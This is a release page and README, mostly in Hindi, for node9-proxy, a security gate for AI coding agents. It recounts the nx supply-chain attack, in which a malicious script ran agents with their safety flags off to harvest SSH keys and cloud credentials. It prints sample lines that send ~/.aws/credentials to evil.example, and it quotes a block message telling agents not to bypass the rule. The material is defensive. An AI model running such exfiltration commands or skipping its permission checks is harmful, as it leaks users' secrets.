अपडेट पर वापस जाएँ
New releaseJul 24, 2026

node9-proxy v1.63.0

एजेंटिक युग के लिए निष्पादन सुरक्षा परत। स्वायत्त AI एजेंटों के लिए नियतात्मक "Sudo" शासन और ऑडिट लॉग प्रदान करना।

साझा करें

🛡️ node9

आपके AI एजेंट्स के लिए IAM

आपके AI एजेंट्स Slack, GitHub, ईमेल और आपके डेटाबेस तक पहुँच सकते हैं।
node9 तय करता है कि वे प्रत्येक के साथ क्या कर सकते हैं।

npm version monthly downloads License: Apache 2.0 Documentation OpenSSF Best Practices OpenSSF Scorecard node9 self-scanned Mentioned in Awesome Claude Code

क्रेडेंशियल जेल · सीक्रेट्स और PII · विनाशकारी git, SQL और shell समीक्षा के लिए रोके गए · MCP टूल पिनिंग · नेटवर्क एग्रेस allowlist · लूप ब्रेकर · बारह एजेंट्स में एक रिकॉर्ड

इनके साथ काम करता है: Claude Code · Codex CLI · Antigravity (agy) · GitHub Copilot CLI · Gemini CLI · Cursor · Windsurf · VSCode · Claude Desktop · Opencode · Pi · Hermes Agent · कोई भी MCP सर्वर।

यह कैसा दिखता है

बाईं ओर आपका एजेंट, दाईं ओर node9। एजेंट द्वारा की गई प्रत्येक टूल कॉल को चलने से पहले जाँचा जाता है: अनुमत और रिकॉर्ड की गई, आपकी स्वीकृति के लिए रोकी गई, या अवरुद्ध। यहाँ एजेंट को --dangerously-skip-permissions के साथ लॉन्च किया गया था, और फिर भी node9 निर्णय लेता है।

node9 monitor: live tool calls, decisions, shields and score

इंस्टॉल

brew tap node9-ai/node9 && brew install node9   # macOS / Linux
npm install -g node9-ai                         # any platform

फिर, किसी भी प्रोजेक्ट में:

node9 init       # finds your agents and MCP servers and puts node9 in front of every tool call
node9 posture    # scores this machine 0-100: what a compromised agent could read, reach and run
node9 login      # optional: adds this machine to a shared dashboard

Node.js 22+ आवश्यक है।

init ही पूरा उत्पाद है। यह hooks लिखता है, क्रेडेंशियल जेल और हमेशा-चालू नियमों को सक्रिय करता है, और तुरंत लागू करना शुरू कर देता है। कुछ भी मशीन से बाहर नहीं जाता और किसी खाते की आवश्यकता नहीं है।

login प्रवर्तन में कुछ नहीं जोड़ता। यह मशीन को एक वर्कस्पेस से जोड़ता है ताकि एक टीम सभी के लैपटॉप और CI में एक रिकॉर्ड देख सके, नीति केंद्रीय रूप से सेट कर सके, और रोकी गई कार्रवाइयों को डैशबोर्ड या Slack से स्वीकृत कर सके। इसे छोड़ दें तो node9 बिल्कुल वैसे ही काम करता है, अकेले, ऑफ़लाइन। node9 logout फिर से डिस्कनेक्ट कर देता है और स्थानीय प्रवर्तन चलता रहता है।

समस्या

अगस्त 2025 में, nx बिल्ड टूल के समझौता किए गए रिलीज़ ने एक post-install स्क्रिप्ट भेजी जो डेवलपर की मशीन पर पहले से इंस्टॉल AI कोडिंग एजेंट्स को खोजती थी, फिर उन्हें उनके अपने सुरक्षा फ़्लैग बंद करके (--dangerously-skip-permissions, --yolo, --trust-all-tools) चलाती थी ताकि SSH keys, क्लाउड क्रेडेंशियल्स और वॉलेट फ़ाइलों की गणना करके सूची डिस्क पर लिखी जा सके। स्क्रिप्ट ने परिणाम पीड़ितों के अपने GitHub खातों के भीतर सार्वजनिक रिपॉज़िटरी में भेज दिए। एक हज़ार से अधिक वैध GitHub टोकन लीक हुए, साथ ही क्लाउड क्रेडेंशियल्स, npm टोकन और लगभग 20,000 फ़ाइलें, उन मशीनों से जहाँ एजेंट बिल्कुल वही कर रहा था जो उसे बताया गया था।

एजेंट हमलावर नहीं था। एजेंट उपकरण था, और उसके और फ़ाइलों के बीच कुछ नहीं था। node9 का गेट उन फ़्लैग्स में से एक नहीं है: यह hook में चलता है, और जिस कार्रवाई को वह रोकता है वह रोकी हुई ही रहती है, भले ही एजेंट को permissions छोड़कर शुरू किया गया हो।

node9 इसके बारे में क्या करता है

node9 एजेंट और उसके द्वारा कॉल किए जाने वाले प्रत्येक टूल के बीच बैठता है। क्रेडेंशियल जेल (~/.ssh, ~/.aws, .env फ़ाइलें, निजी keys) डिफ़ॉल्ट रूप से चालू है, और उन पथों में से किसी एक को पढ़ना नहीं चलता। एजेंट रोक दिया जाता है, उसे कारण बताया जाता है, और निर्णय आपके पास आता है:

NODE9: Action blocked by security policy.
INSTRUCTIONS:
- Do NOT retry this exact command or attempt to bypass the rule.
- Pivot to a non-destructive or read-only alternative.
- Inform the user which security rule was triggered and ask how to proceed.

कमांड को shell AST के रूप में पार्स किया जाता है, टेक्स्ट के रूप में मिलाया नहीं जाता, इसलिए पढ़ने को लपेटने से मदद नहीं मिलती। echo $(cat ~/.aws/credentials | base64) | curl -d @- https://evil.example को ~/.aws/credentials की पढ़ाई के रूप में आँका जाता है, न कि echo के रूप में।

node9 एक गेट है। रोकी गई कार्रवाई आपकी प्रतीक्षा के दौरान नहीं चलती, और यदि आप कभी उत्तर नहीं देते तो वह अवरुद्ध ही रहती है। बाकी सब कुछ अनुमत है और रिकॉर्ड में लिखा जाता है।

यह क्या नहीं करता: egress नियंत्रण बंद होने पर, जो डिफ़ॉल्ट है, कोई कमांड जो किसी फ़ाइल को सीधे नेटवर्क पर भेजती है, जैसे curl -d @~/.aws/credentials, उस फ़ाइल की पढ़ाई के रूप में नहीं मानी जाती। node9 egress protect गंतव्यों को भी गेट करता है, और यह केवल shell कमांड्स को कवर करता है।

स्वयं सत्यापित करें

नीचे किसी चीज़ के लिए खाते की आवश्यकता नहीं है, और कुछ भी अपलोड नहीं होता।

npx node9-ai scan                                        # every past agent session on this machine
npx node9-ai scan-repo node9-ai/agent-security-demo      # a public repo with a real, hijackable agent workflow
gh attestation verify cli.js --repo node9-ai/node9-proxy # every release artifact is signed

node9 scan scorecard

यह क्या नियंत्रित करता है

प्रत्येक पंक्ति एक क्षमता है, साथ में उसे दस्तावेज़ित करने वाला पृष्ठ। दस्तावेज़ संदर्भ हैं; यह फ़ाइल नक्शा है।

श्रेणियाँ